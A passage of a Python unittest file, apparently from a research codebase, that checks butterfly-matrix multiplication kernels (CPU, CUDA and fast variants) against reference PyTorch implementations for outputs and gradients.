] | null | null | null | tests/test_butterfly_multiply.py | iclr-anonymous/kaleidoscope | 2ad84d2da9c007b2774e2ba048ce4ca40d56b29a | [
"Apache-2.0"
] | 1 | 2019-10-15T08:16:16.000Z | 2019-10-15T08:16:16.000Z | import os, sys
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import math
import unittest
import torch
from butterfly import Butterfly
from butterfly.utils import twiddle_normal_to_fast_format
from cnn.models.butterfly_conv import ButterflyConv2d
from butterfly.butterfly_multiply import butterfly_mult_torch, butterfly_mult, butterfly_mult_inplace, butterfly_mult_factors
from butterfly.butterfly_multiply import butterfly_mult_untied_torch, butterfly_mult_untied
from butterfly.butterfly_multiply import butterfly_ortho_mult_tied_torch, butterfly_ortho_mult_tied
from butterfly.butterfly_multiply import butterfly_ortho_mult_untied_torch, butterfly_ortho_mult_untied
from butterfly.butterfly_multiply import bbt_mult_untied_torch, bbt_mult_untied
from butterfly.butterfly_multiply import bbt_ortho_mult_untied_torch, bbt_ortho_mult_untied
from butterfly.butterfly_multiply import butterfly_mult_conv2d_torch, butterfly_mult_conv2d
from butterfly.butterfly_multiply import bbt_mult_conv2d_torch, bbt_mult_conv2d
from butterfly.butterfly_multiply import butterfly_mult_untied_svd_torch, butterfly_mult_untied_svd
from butterfly.butterfly_multiply import butterfly_mult_conv2d_svd_torch, butterfly_mult_conv2d_svd
# from factor_multiply import butterfly_multiply_untied_eval
from factor_multiply_fast import butterfly_multiply_untied_forward_fast
from factor_multiply_fast import butterfly_multiply_untied_forward_backward_fast
from factor_multiply_fast import butterfly_bbs_multiply_untied_forward_fast
from factor_multiply_fast import butterfly_bbs_multiply_untied_forward_backward_fast
from factor_multiply_fast import butterfly_ortho_multiply_untied_forward_fast
from factor_multiply_fast import butterfly_ortho_multiply_untied_backward_fast
from factor_multiply_fast import butterfly_odo_multiply_untied_forward_fast
from factor_multiply_fast import butterfly_odo_multiply_untied_backward_fast
from factor_multiply_fast import butterfly_odo_multiply_untied_forward_backward_fast
class ButterflyMultTest(unittest.TestCase):
def setUp(self):
self.rtol = 1e-3
self.atol = 1e-5
def test_butterfly(self):
batch_size = 10
n = 4096
nstack = 2
for device in ['cpu'] + ([] if not torch.cuda.is_available() else ['cuda']):
for complex in [False, True]:
for increasing_stride in [True, False]:
scaling = 1 / math.sqrt(2) if not complex else 1 / 2
twiddle = torch.randn((nstack, n - 1, 2, 2) + (() if not complex else (2, )), requires_grad=True, device=device) * scaling
input = torch.randn((batch_size, nstack, n) + (() if not complex else (2, )), requires_grad=True, device=twiddle.device)
output = butterfly_mult(twiddle, input, increasing_stride)
output_torch = butterfly_mult_torch(twiddle, input, increasing_stride)
self.assertTrue(torch.allclose(output, output_torch, rtol=self.rtol, atol=self.atol),
((output - output_torch).abs().max().item(), device, complex, increasing_stride))
grad = torch.randn_like(output_torch)
d_twiddle, d_input = torch.autograd.grad(output, (twiddle, input), grad, retain_graph=True)
d_twiddle_torch, d_input_torch = torch.autograd.grad(output_torch, (twiddle, input), grad, retain_graph=True)
self.assertTrue(torch.allclose(d_input, d_input_torch, rtol=self.rtol, atol=self.atol),
((d_input - d_input_torch).abs().max().item(), device, complex, increasing_stride))
# print((d_twiddle - d_twiddle_torch) / d_twiddle_torch)
self.assertTrue(torch.allclose(d_twiddle, d_twiddle_torch, rtol=self.rtol, atol=self.atol),
(((d_twiddle - d_twiddle_torch) / d_twiddle_torch).abs().max().item(), device, complex, increasing_stride))
def test_butterfly_untied(self):
for batch_size, n in [(10, 4096), (8192, 256)]: # Test size smaller than 1024 and large batch size for race conditions
m = int(math.log2(n))
nstack = 2
for device in ['cpu'] + ([] if not torch.cuda.is_available() else ['cuda']):
for complex in [False, True]:
for increasing_stride in [True, False]:
if batch_size > 1024 and (device == 'cpu' or complex):
continue
scaling = 1 / math.sqrt(2) if not complex else 1 / 2
twiddle = torch.randn((nstack, m, n // 2, 2, 2) + (() if not complex else (2, )), requires_grad=True, device=device) * scaling
input = torch.randn((batch_size, nstack, n) + (() if not complex else (2, )), requires_grad=True, device=twiddle.device)
output = butterfly_mult_untied(twiddle, input, increasing_stride)
output_torch = butterfly_mult_untied_torch(twiddle, input, increasing_stride)
self.assertTrue(torch.allclose(output, output_torch, rtol=self.rtol, atol=self.atol),
((output - output_torch).abs().max().item(), device, complex, increasing_stride))
grad = torch.randn_like(output_torch)
d_twiddle, d_input = torch.autograd.grad(output, (twiddle, input), grad, retain_graph=True)
d_twiddle_torch, d_input_torch = torch.autograd.grad(output_torch, (twiddle, input), grad, retain_graph=True)
self.assertTrue(torch.allclose(d_input, d_input_torch, rtol=self.rtol, atol=self.atol),
((d_input - d_input_torch).abs().max().item(), device, complex, increasing_stride))
# if device == 'cuda' and batch_size > 1024 and not complex and increasing_stride:
# print((d_twiddle - d_twiddle_torch).abs().mean(dim=(0, 2, 3, 4)))
# print(((d_twiddle - d_twiddle_torch) / d_twiddle_torch).abs().mean(dim=(0, 2, 3, 4)))
# i = ((d_twiddle - d_twiddle_torch) / d_twiddle_torch).abs().argmax()
# print(d_twiddle.flatten()[i])
# print(d_twiddle_torch.flatten()[i])
# print(d_twiddle.flatten()[i-5:i+5])
# print(d_twiddle_torch.flatten()[i-5:i+5])
self.assertTrue(torch.allclose(d_twiddle, d_twiddle_torch, rtol=self.rtol * (10 if batch_size > 1024 else 1),
atol=self.atol * (10 if batch_size > 1024 else 1)),
(((d_twiddle - d_twiddle_torch) / d_twiddle_torch).abs().max().item(),
(batch_size, n), device, complex, increasing_stride))
def test_butterfly_untied_eval(self):
for batch_size, n in [(1, 256), (2, 512), (8, 512), (10, 512)]:
m = int(math.log2(n))
nstack = 2
for device in ['cpu']:
for complex in [ True]:
for increasing_stride in [True, False]:
scaling = 1 / math.sqrt(2)
twiddle = torch.randn((nstack, m, n // 2, 2, 2), requires_grad=True, device=device) * scaling
input = torch.randn((batch_size, nstack, n), requires_grad=True, device=twiddle.device)
output = butterfly_multiply_untied_eval(twiddle, input, increasing_stride)
output_torch = butterfly_mult_untied_torch(twiddle, input, increasing_stride)
self.assertTrue(torch.allclose(output, output_torch, rtol=self.rtol, atol=self.atol),
((output - output_torch).abs().max().item(), device, complex, increasing_stride))
def test_butterfly_ortho_tied(self):
for batch_size, n in [(10, 4096), (8192, 256)]: # Test size smaller than 1024 and large batch size for race conditions
m = int(math.log2(n))
nstack = 2
for device in ['cpu'] + ([] if not torch.cuda.is_available() else ['cuda']):
for increasing_stride in [True, False]:
if batch_size > 1024 and (device == 'cpu'):
continue
twiddle = torch.rand((nstack, n - 1), requires_grad=True, device=device) * 2 * math.pi
input = torch.randn((batch_size, nstack, n), requires_grad=True, device=twiddle.device)
output = butterfly_ortho_mult_tied(twiddle, input, increasing_stride)
output_torch = butterfly_ortho_mult_tied_torch(twiddle, input, increasing_stride)
self.assertTrue(torch.allclose(output, output_torch, rtol=self.rtol, atol=self.atol),
((output - output_torch).abs().max().item(), device, increasing_stride))
grad = torch.randn_like(output_torch)
d_twiddle, d_input = torch.autograd.grad(output, (twiddle, input), grad, retain_graph=True)
d_twiddle_torch, d_input_torch = torch.autograd.grad(output_torch, (twiddle, input), grad, retain_graph=True)
self.assertTrue(torch.allclose(d_input, d_input_torch, rtol=self.rtol, atol=self.atol),
((d_input - d_input_torch).abs().max().item(), device, increasing_stride))
self.assertTrue(torch.allclose(d_twiddle, d_twiddle_torch, rtol=self.rtol * (10 if batch_size > 1024 else 1),
atol=self.atol * (10 if batch_size > 1024 else 1)),
(((d_twiddle - d_twiddle_torch) / d_twiddle_torch).abs().max().item(),
(batch_size, n), device, increasing_stride))
def test_butterfly_ortho_untied(self):
for batch_size, n in [(10, 4096), (8192, 256)]: # Test size smaller than 1024 and large batch size for race conditions
m = int(math.log2(n))
nstack = 2
for device in ['cpu'] + ([] if not torch.cuda.is_available() else ['cuda']):
for increasing_stride in [True, False]:
if batch_size > 1024 and (device == 'cpu'):
continue
twiddle = torch.rand((nstack, m, n // 2), requires_grad=True, device=device) * 2 * math.pi
input = torch.randn((batch_size, nstack, n), requires_grad=True, device=twiddle.device)
output = butterfly_ortho_mult_untied(twiddle, input, increasing_stride)
output_torch = butterfly_ortho_mult_untied_torch(twiddle, input, increasing_stride)
self.assertTrue(torch.allclose(output, output_torch, rtol=self.rtol, atol=self.atol),
((output - output_torch).abs().max().item(), device, increasing_stride))
grad = torch.randn_like(output_torch)
d_twiddle, d_input = torch.autograd.grad(output, (twiddle, input), grad, retain_graph=True)
d_twiddle_torch, d_input_torch = torch.autograd.grad(output_torch, (twiddle, input), grad, retain_graph=True)
self.assertTrue(torch.allclose(d_input, d_input_torch, rtol=self.rtol, atol=self.atol),
((d_input - d_input_torch).abs().max().item(), device, increasing_stride))
self.assertTrue(torch.allclose(d_twiddle, d_twiddle_torch, rtol=self.rtol * (10 if batch_size > 1024 else 1),
atol=self.atol * (10 if batch_size > 1024 else 1)),
(((d_twiddle - d_twiddle_torch) / d_twiddle_torch).abs().max().item(),
(batch_size, n), device, increasing_stride))
def test_bbt_untied(self):
for batch_size, n in [(2048, 512), (10, 4096)]:
for nblocks in list(range(1, 4)) + [10, 14]: # Test nblocks >= 7
m = int(math.log2(n))
nstack = 2
for device in ([] if not torch.cuda.is_available() else ['cuda']) + ['cpu']:
if batch_size > 1024 and device == 'cpu':
continue
scaling = 1 / 2
twiddle = torch.randn((nstack, nblocks * 2 * m, n // 2, 2, 2), requires_grad=True, device=device) * scaling
input = torch.randn((batch_size, nstack, n), requires_grad=True, device=twiddle.device)
output = bbt_mult_untied(twiddle, input)
output_torch = bbt_mult_untied_torch(twiddle, input)
self.assertTrue(torch.allclose(output, output_torch, rtol=self.rtol, atol=self.atol),
((output - output_torch).abs().max().item(), nblocks, device))
grad = torch.randn_like(output_torch)
d_twiddle, d_input = torch.autograd.grad(output, (twiddle, input), grad, retain_graph=True)
d_twiddle_torch, d_input_torch = torch.autograd.grad(output_torch, (twiddle, input), grad, retain_graph=True)
self.assertTrue(torch.allclose(d_input, d_input_torch, rtol=self.rtol, atol=self.atol),
((d_input - d_input_torch).abs().max().item(), nblocks, device))
# if device == 'cuda' and batch_size > 1024 and not complex and increasing_stride:
# print((d_twiddle - d_twiddle_torch).abs().mean(dim=(0, 2, 3, 4)))
# print(((d_twiddle - d_twiddle_torch) / d_twiddle_torch).abs().mean(dim=(0, 2, 3, 4)))
# i = ((d_twiddle - d_twiddle_torch) / d_twiddle_torch).abs().argmax()
# print(d_twiddle.flatten()[i])
# print(d_twiddle_torch.flatten()[i])
# print(d_twiddle.flatten()[i-5:i+5])
# print(d_twiddle_torch.flatten()[i-5:i+5])
self.assertTrue(torch.allclose(d_twiddle, d_twiddle_torch, rtol=self.rtol * (10 if batch_size > 1024 else 1),
atol=self.atol * (10 if batch_size > 1024 else 1)),
(((d_twiddle - d_twiddle_torch) / d_twiddle_torch).abs().max().item(),
(batch_size, n), nblocks, device))
def test_bbt_ortho_untied(self):
for batch_size, n in [(2048, 512), (10, 4096)]:
for nblocks in list(range(1, 4)) + [10, 14]: # Test nblocks >= 7
m = int(math.log2(n))
nstack = 2
for device in ([] if not torch.cuda.is_available() else ['cuda']) + ['cpu']:
if batch_size > 1024 and device == 'cpu':
continue
twiddle = torch.rand((nstack, nblocks * 2 * m, n // 2), requires_grad=True, device=device) * 2 * math.pi
input = torch.randn((batch_size, nstack, n), requires_grad=True, device=twiddle.device)
output = bbt_ortho_mult_untied(twiddle, input)
output_torch = bbt_ortho_mult_untied_torch(twiddle, input)
self.assertTrue(torch.allclose(output, output_torch, rtol=self.rtol, atol=self.atol),
((output - output_torch).abs().max().item(), (batch_size, n), nblocks, device))
grad = torch.randn_like(output_torch)
d_twiddle, d_input = torch.autograd.grad(output, (twiddle, input), grad, retain_graph=True)
d_twiddle_torch, d_input_torch = torch.autograd.grad(output_torch, (twiddle, input), grad, retain_graph=True)
self.assertTrue(torch.allclose(d_input, d_input_torch, rtol=self.rtol, atol=self.atol),
((d_input - d_input_torch).abs().max().item(), (batch_size, n), nblocks, device))
# if device == 'cuda' and batch_size > 1024 and nblocks == 14:
# print((d_twiddle - d_twiddle_torch).abs().mean(dim=(0, 2)))
# print(((d_twiddle - d_twiddle_torch) / d_twiddle_torch).abs().mean(dim=(0, 2)))
# i = ((d_twiddle - d_twiddle_torch) / d_twiddle_torch).abs().argmax()
# print(d_twiddle.flatten()[i])
# print(d_twiddle_torch.flatten()[i])
# print(d_twiddle.flatten()[i-5:i+5])
# print(d_twiddle_torch.flatten()[i-5:i+5])
# Seems to fail for large nblocks because there's likely to be a d_twiddle that's really small.
# I guess it's fine.
self.assertTrue(torch.allclose(d_twiddle, d_twiddle_torch, rtol=self.rtol * (10 if batch_size > 1024 else 1),
atol=self.atol * (10 if batch_size > 1024 else 1)),
(((d_twiddle - d_twiddle_torch) / d_twiddle_torch).abs().max().item(),
(batch_size, n), nblocks, device))
def test_butterfly_untied_svd(self):
for batch_size, n in [(10, 4096), (99, 128)]: # Test size smaller than 1024
m = int(math.log2(n))
nstack = 2
for device in ['cpu'] + ([] if not torch.cuda.is_available() else ['cuda']):
for increasing_stride in [True, False]:
scaling = 1 / math.sqrt(2)
twiddle = torch.randn((nstack, m, n // 2, 2, 2), requires_grad=True, device=device) * scaling
input = torch.randn((batch_size, nstack, n), requires_grad=True, device=twiddle.device)
output = butterfly_mult_untied_svd(twiddle, input, increasing_stride)
output_torch = butterfly_mult_untied_svd_torch(twiddle, input, increasing_stride)
self.assertTrue(torch.allclose(output, output_torch, rtol=self.rtol, atol=self.atol),
((output - output_torch).abs().max().item(), device, increasing_stride))
grad = torch.randn_like(output_torch)
d_twiddle, d_input = torch.autograd.grad(output, (twiddle, input), grad, retain_graph=True)
d_twiddle_torch, d_input_torch = torch.autograd.grad(output_torch, (twiddle, input), grad, retain_graph=True)
self.assertTrue(torch.allclose(d_input, d_input_torch, rtol=self.rtol, atol=self.atol),
((d_input - d_input_torch).abs().max().item(), device, increasing_stride))
# print((d_twiddle - d_twiddle_torch) / d_twiddle_torch)
self.assertTrue(torch.allclose(d_twiddle, d_twiddle_torch, rtol=self.rtol, atol=self.atol),
(((d_twiddle - d_twiddle_torch) / d_twiddle_torch).abs().max().item(), device, increasing_stride))
# @unittest.skip("Not numerically stable if twiddle factors aren't orthogonal")
def test_butterfly_inplace_cpu(self):
batch_size = 10
n = 4096
# TODO: in-place implementation doesn't support nstack for now
nstack = 1
b = Butterfly(n, n, bias=False, ortho_init=True)
twiddle = b.twiddle
input = torch.randn(batch_size, nstack, n, requires_grad=True)
output_inplace = butterfly_mult_inplace(twiddle.squeeze(0), input.squeeze(1))
output_torch = butterfly_mult_torch(twiddle, input).squeeze(1)
self.assertTrue(torch.allclose(output_inplace, output_torch, rtol=self.rtol, atol=self.atol),
(output_inplace - output_torch).abs().max().item())
grad = torch.randn_like(output_torch)
d_twiddle_inplace, d_input_inplace = torch.autograd.grad(output_inplace, (twiddle, input), grad, retain_graph=True)
d_twiddle_torch, d_input_torch = torch.autograd.grad(output_torch, (twiddle, input), grad, retain_graph=True)
self.assertTrue(torch.allclose(d_input_inplace, d_input_torch, rtol=self.rtol, atol=self.atol),
(d_input_inplace - d_input_torch).abs().max().item())
# print((d_twiddle_inplace - d_twiddle_torch) / d_twiddle_torch)
self.assertTrue(torch.allclose(d_twiddle_inplace, d_twiddle_torch, rtol=self.rtol, atol=self.atol),
((d_twiddle_inplace - d_twiddle_torch) / d_twiddle_torch).abs().max().item())
# @unittest.skip("Not numerically stable if twiddle factors aren't orthogonal")
def test_butterfly_complex_inplace_cpu(self):
batch_size = 10
n = 4096
# TODO: in-place implementation doesn't support nstack for now
nstack = 1
b = Butterfly(n, n, bias=False, complex=True, ortho_init=True)
twiddle = b.twiddle
input = torch.randn(batch_size, nstack, n, 2, requires_grad=True)
output_inplace = butterfly_mult_inplace(twiddle.squeeze(0), input.squeeze(1))
output_torch = butterfly_mult_torch(twiddle, input).squeeze(1)
self.assertTrue(torch.allclose(output_inplace, output_torch, rtol=self.rtol, atol=self.atol),
(output_inplace - output_torch).abs().max().item())
# @unittest.skip("Not numerically stable if twiddle factors aren't orthogonal")
@unittest.skipIf(not torch.cuda.is_available(), "need CUDA")
def test_butterfly_inplace_cuda(self):
batch_size = 10
n = 4096
# TODO: in-place implementation doesn't support nstack for now
nstack = 1
b = Butterfly(n, n, bias=False, ortho_init=True).to('cuda')
twiddle = b.twiddle
input = torch.randn(batch_size, nstack, n, requires_grad=True, device=twiddle.device)
output_inplace = butterfly_mult_inplace(twiddle.squeeze(0), input.squeeze(1))
output_torch = butterfly_mult_torch(twiddle, input).squeeze(1)
self.assertTrue(torch.allclose(output_inplace, output_torch, rtol=self.rtol, atol=self.atol),
(output_inplace - output_torch).abs().max().item())
grad = torch.randn_like(output_torch)
d_twiddle_inplace, d_input_inplace = torch.autograd.grad(output_inplace, (twiddle, input), grad, retain_graph=True)
d_twiddle_torch, d_input_torch = torch.autograd.grad(output_torch, (twiddle, input), grad, retain_graph=True)
self.assertTrue(torch.allclose(d_input_inplace, d_input_torch, rtol=self.rtol, atol=self.atol),
(d_input_inplace - d_input_torch).abs().max().item())
# print((d_twiddle_inplace - d_twiddle_torch) / d_twiddle_torch)
self.assertTrue(torch.allclose(d_twiddle_inplace, d_twiddle_torch, rtol=self.rtol, atol=self.atol),
((d_twiddle_inplace - d_twiddle_torch) / d_twiddle_torch).abs().max().item())
def test_butterfly_factors(self):
batch_size = 10
n = 4096
nstack = 1 # Does not support nstack
for device in ['cpu'] + ([] if not torch.cuda.is_available() else ['cuda']):
for complex in [False, True]:
for increasing_stride in [True, False]:
scaling = 1 / math.sqrt(2) if not complex else 1 / 2
twiddle = torch.randn((nstack, n - 1, 2, 2) + (() if not complex else (2, )), requires_grad=True, device=device) * scaling
input = torch.randn((batch_size, nstack, n) + (() if not complex else (2, )), requires_grad=True, device=twiddle.device)
output = butterfly_mult_factors(twiddle.squeeze(0), input.squeeze(1), increasing_stride=increasing_stride)
output_torch = butterfly_mult_torch(twiddle, input, increasing_stride=increasing_stride).squeeze(1)
self.assertTrue(torch.allclose(output, output_torch, rtol=self.rtol, atol=self.atol),
((output - output_torch).abs().max().item(), device, complex, increasing_stride))
grad = torch.randn_like(output_torch)
d_twiddle, d_input = torch.autograd.grad(output, (twiddle, input), grad, retain_graph=True)
d_twiddle_torch, d_input_torch = torch.autograd.grad(output_torch, (twiddle, input), grad, retain_graph=True)
self.assertTrue(torch.allclose(d_input, d_input_torch, rtol=self.rtol, atol=self.atol),
((d_input - d_input_torch).abs().max().item(), device, complex, increasing_stride))
# print((d_twiddle - d_twiddle_torch) / d_twiddle_torch)
self.assertTrue(torch.allclose(d_twiddle, d_twiddle_torch, rtol=self.rtol, atol=self.atol),
(((d_twiddle - d_twiddle_torch) / d_twiddle_torch).abs().max().item(), device, complex, increasing_stride))
def test_butterfly_conv2d(self):
device = 'cuda'
c_in = 256
kernel_size = 3
batch_size = 128
f_dim = 8
padding = 1
for c_out in [c_in, 2*c_in]:
nstack = c_out // c_in * kernel_size * kernel_size
m = int(math.log2(c_in))
for increasing_stride in [True, False]:
scaling = 1 / math.sqrt(2)
twiddle = torch.randn((nstack, m, c_in // 2, 2, 2), requires_grad=True, device=device) * scaling
input_ = torch.randn(batch_size, c_in, f_dim, f_dim,
requires_grad=True).to(device)
# test forward pass
output_torch = butterfly_mult_conv2d_torch(twiddle, input_, kernel_size,
padding, increasing_stride)
output = butterfly_mult_conv2d(twiddle, input_, kernel_size,
padding, increasing_stride)
self.assertTrue(torch.allclose(output, output_torch, rtol=self.rtol, atol=self.atol),
((output - output_torch).abs().max().item(), device, c_out, increasing_stride))
# test backward pass
grad = torch.randn_like(output_torch)
d_twiddle, d_input = torch.autograd.grad(output, (twiddle, input_),
grad, retain_graph=True)
d_twiddle_torch, d_input_torch = torch.autograd.grad(output_torch,
(twiddle, input_), grad, retain_graph=True)
self.assertTrue(torch.allclose(d_input, d_input_torch,
rtol=self.rtol, atol=self.atol),
((d_input - d_input_torch).abs().max().item(), device, c_out, increasing_stride))
self.assertTrue(torch.allclose(d_twiddle, d_twiddle_torch,
rtol=self.rtol * 10, atol=self.atol * 10),
(((d_twiddle - d_twiddle_torch) / d_twiddle_torch).abs().max().item(), device, c_out, increasing_stride))
def test_bbt_conv2d(self):
device = 'cuda'
c_in = 256
kernel_size = 3
batch_size = 128
f_dim = 8
padding = 1
for c_out in [c_in, 2*c_in]:
nstack = c_out // c_in * kernel_size * kernel_size
m = int(math.log2(c_in))
# for nblocks in list(range(1, 4)) + [10, 14]: # Test nblocks >= 7
for nblocks in list(range(1, 3)): # Test nblocks >= 7
scaling = 1 / math.sqrt(2)
twiddle = torch.randn((nstack, nblocks * 2 * m, c_in // 2, 2, 2), requires_grad=True, device=device) * scaling
input_ = torch.randn(batch_size, c_in, f_dim, f_dim,
requires_grad=True).to(device)
# test forward pass
output_torch = bbt_mult_conv2d_torch(twiddle, input_, kernel_size, padding)
output = bbt_mult_conv2d(twiddle, input_, kernel_size, padding)
self.assertTrue(torch.allclose(output, output_torch, rtol=self.rtol, atol=self.atol),
((output - output_torch).abs().max().item(), device, nblocks, c_out))
# test backward pass
grad = torch.randn_like(output_torch)
d_twiddle, d_input = torch.autograd.grad(output, (twiddle, input_),
grad, retain_graph=True)
d_twiddle_torch, d_input_torch = torch.autograd.grad(output_torch,
(twiddle, input_), grad, retain_graph=True)
self.assertTrue(torch.allclose(d_input, d_input_torch,
rtol=self.rtol, atol=self.atol),
((d_input - d_input_torch).abs().max().item(), device, nblocks, c_out))
self.assertTrue(torch.allclose(d_twiddle, d_twiddle_torch,
rtol=self.rtol * 10, atol=self.atol * 10),
(((d_twiddle - d_twiddle_torch) / d_twiddle_torch).abs().max().item(), device, nblocks, c_out))
def test_butterfly_conv2d_svd(self):
device = 'cuda'
c_in = 256
kernel_size = 3
batch_size = 128
f_dim = 8
padding = 1
for c_out in [c_in, 2*c_in]:
nstack = c_out // c_in * kernel_size * kernel_size
m = int(math.log2(c_in))
for increasing_stride in [True, False]:
scaling = 1 / math.sqrt(2)
twiddle = torch.randn((nstack, m, c_in // 2, 2, 2), requires_grad=True, device=device) * scaling
input_ = torch.randn(batch_size, c_in, f_dim, f_dim,
requires_grad=True).to(device)
# test forward pass
output_torch = butterfly_mult_conv2d_svd_torch(twiddle, input_, kernel_size,
padding, increasing_stride)
output = butterfly_mult_conv2d_svd(twiddle, input_, kernel_size,
padding, increasing_stride)
self.assertTrue(torch.allclose(output, output_torch, rtol=self.rtol, atol=self.atol),
((output - output_torch).abs().max().item(), device, c_out, increasing_stride))
# test backward pass
grad = torch.randn_like(output_torch)
d_twiddle, d_input = torch.autograd.grad(output, (twiddle, input_),
grad, retain_graph=True)
d_twiddle_torch, d_input_torch = torch.autograd.grad(output_torch,
(twiddle, input_), grad, retain_graph=True)
self.assertTrue(torch.allclose(d_input, d_input_torch,
rtol=self.rtol, atol=self.atol),
((d_input - d_input_torch).abs().max().item(), device, c_out, increasing_stride))
self.assertTrue(torch.allclose(d_twiddle, d_twiddle_torch,
rtol=self.rtol * 10, atol=self.atol * 10),
(((d_twiddle - d_twiddle_torch) / d_twiddle_torch).abs().max().item(), device, c_out, increasing_stride))
def test_butterfly_untied_fast(self):
for batch_size, n in [(2048, 512)]:
m = int(math.log2(n))
nstack = 1
# for device in ['cpu'] + ([] if not torch.cuda.is_available() else ['cuda']):
for device in ['cuda']:
# for complex in [False, True]:
for complex in [False]:
for increasing_stride in [True, False]:
# for increasing_stride in [False]:
if batch_size > 1024 and (device == 'cpu' or complex):
continue
scaling = 1 / math.sqrt(2) if not complex else 1 / 2
twiddle = torch.randn((nstack, m, n // 2, 2, 2) + (() if not complex else (2, )), requires_grad=True, device=device) * scaling
# twiddle = torch.arange(2 * n, dtype=torch.float, device=device, requires_grad=True).reshape(n // 2, 2, 2).unsqueeze(0).repeat(m, 1, 1, 1).unsqueeze(0)
twiddle_fast = twiddle_normal_to_fast_format(twiddle)
if not increasing_stride:
twiddle_fast = twiddle_fast.flip(1)
input = torch.randn((batch_size, nstack, n) + (() if not complex else (2, )), requires_grad=True, device=twiddle.device)
# input = torch.arange(n, dtype=torch.float, device=device, requires_grad=True).unsqueeze(0).unsqueeze(1).expand(batch_size, -1, -1)
output = butterfly_multiply_untied_forward_fast(twiddle_fast, input, increasing_stride)
# output_old = butterfly_mult_untied_torch(twiddle, input, increasing_stride)
output_old = butterfly_mult_untied(twiddle, input, increasing_stride)
self.assertTrue(torch.allclose(output, output_old, rtol=self.rtol, atol=self.atol),
((output - output_old).abs().max().item(), device, complex, increasing_stride))
if n > 4096:
continue
grad = torch.randn_like(output)
d_twiddle, d_input = butterfly_multiply_untied_forward_backward_fast(twiddle_fast, input,
grad, increasing_stride)
# d_twiddle, d_input = torch.autograd.grad(output, (twiddle_fast, input), grad, retain_graph=True)
d_twiddle_old, d_input_old = torch.autograd.grad(output_old, (twiddle, input), grad, retain_graph=True)
self.assertTrue(torch.allclose(d_input, d_input_old, rtol=self.rtol, atol=self.atol),
((d_input - d_input_old).abs().max().item(), device, complex, increasing_stride))
# # if device == 'cuda' and batch_size > 1024 and not complex and increasing_stride:
# # print((d_twiddle - d_twiddle_torch).abs().mean(dim=(0, 2, 3, 4)))
# # print(((d_twiddle - d_twiddle_torch) / d_twiddle_torch).abs().mean(dim=(0, 2, 3, 4)))
# # i = ((d_twiddle - d_twiddle_torch) / d_twiddle_torch).abs().argmax()
# # print(d_twiddle.flatten()[i])
# # print(d_twiddle_torch.flatten()[i])
# # print(d_twiddle.flatten()[i-5:i+5])
# # print(d_twiddle_torch.flatten()[i-5:i+5])
d_twiddle_old = twiddle_normal_to_fast_format(d_twiddle_old)
if not increasing_stride:
d_twiddle_old = d_twiddle_old.flip(1)
self.assertTrue(torch.allclose(d_twiddle, d_twiddle_old, rtol=self.rtol * (10 if batch_size > 1024 else 1),
atol=self.atol * (10 if batch_size > 1024 else 1)),
(((d_twiddle - d_twiddle_old) / d_twiddle_old).abs().max().item(),
(batch_size, n), device, complex, increasing_stride))
def test_butterfly_bbs_untied_fast(self):
for batch_size, n in [(2048, 512)]:
m = int(math.log2(n))
nstack = 1
nblocks = 3
# for device in ['cpu'] + ([] if not torch.cuda.is_available() else ['cuda']):
for device in ['cuda']:
if batch_size > 1024 and (device == 'cpu'):
continue
scaling = 1 / math.sqrt(2)
twiddle = torch.randn((nstack, nblocks * 2 * m, n // 2, 2, 2), requires_grad=True, device=device) * scaling
# twiddle = torch.arange(16.0, requires_grad=True, device=device).view(nstack, nblocks * 2 * m, n // 2, 2, 2)
input = torch.randn((batch_size, nstack, n), requires_grad=True, device=twiddle.device)
# input = torch.arange(2.0, requires_grad=True, device=twiddle.device).view(batch_size, nstack, n)
twiddle_fast = []
for i, chunk in enumerate(twiddle.chunk(nblocks * 2, dim=1)):
chunk_fast = twiddle_normal_to_fast_format(chunk)
if i % 2 == 0:
chunk_fast = chunk_fast.flip(1)
twiddle_fast.append(chunk_fast)
twiddle_fast = torch.cat(twiddle_fast, dim=1)
output = butterfly_bbs_multiply_untied_forward_fast(twiddle_fast, input)
output_old = input
for block in range(nblocks):
output_old = butterfly_mult_untied(twiddle[:, block * 2 * m:(block * 2 + 1) * m], output_old, False)
output_old = butterfly_mult_untied(twiddle[:, (block * 2 + 1) * m:(block + 1) * 2 * m], output_old, True)
self.assertTrue(torch.allclose(output, output_old, rtol=self.rtol, atol=self.atol),
((output - output_old).abs().max().item(), device))
grad = torch.randn_like(output)
# grad = input.clone()
d_twiddle, d_input = butterfly_bbs_multiply_untied_forward_backward_fast(twiddle_fast, input, grad)
# d_twiddle, d_input = torch.autograd.grad(output, (twiddle_fast, input), grad, retain_graph=True)
d_twiddle_old, d_input_old = torch.autograd.grad(output_old, (twiddle, input), grad, retain_graph=True)
self.assertTrue(torch.allclose(d_input, d_input_old, rtol=self.rtol, atol=self.atol),
((d_input - d_input_old).abs().max().item(), device))
d_twiddle_temp = []
for i, chunk in enumerate(d_twiddle_old.chunk(nblocks * 2, dim=1)):
chunk_fast = twiddle_normal_to_fast_format(chunk)
if i % 2 == 0:
chunk_fast = chunk_fast.flip(1)
d_twiddle_temp.append(chunk_fast)
d_twiddle_old = torch.cat(d_twiddle_temp, dim=1)
self.assertTrue(torch.allclose(d_twiddle, d_twiddle_old, rtol=self.rtol * (10 if batch_size > 1024 else 1),
atol=self.atol * (10 if batch_size > 1024 else 1)),
(((d_twiddle - d_twiddle_old) / d_twiddle_old).abs().max().item(),
(batch_size, n), device))
def test_butterfly_ortho_untied_fast(self):
for batch_size, n in [(2048, 4096)]:
m = int(math.log2(n))
nstack = 1
# for device in ['cpu'] + ([] if not torch.cuda.is_available() else ['cuda']):
for device in ['cuda']:
for increasing_stride in [True, False]:
if batch_size > 1024 and (device == 'cpu'):
continue
twiddle = torch.rand((nstack, m, n // 2), requires_grad=True, device=device) * 2 * math.pi
# twiddle = torch.ones((nstack, m, n // 2), requires_grad=True, device=device) * 2 * math.pi * 0.3
twiddle_fast = twiddle if increasing_stride else twiddle.flip(1)
input = torch.randn((batch_size, nstack, n), requires_grad=True, device=twiddle.device)
twiddle_fast_cos, twiddle_fast_sin = twiddle_fast.cos(), twiddle_fast.sin()
output = butterfly_ortho_multiply_untied_forward_fast(twiddle_fast_cos, twiddle_fast_sin, input, increasing_stride)
# output_old = butterfly_ortho_mult_untied_torch(twiddle, input)
output_old = butterfly_ortho_mult_untied(twiddle, input, increasing_stride)
self.assertTrue(torch.allclose(output, output_old, rtol=self.rtol, atol=self.atol),
((output - output_old).abs().max().item(), device, increasing_stride))
grad = torch.randn_like(output)
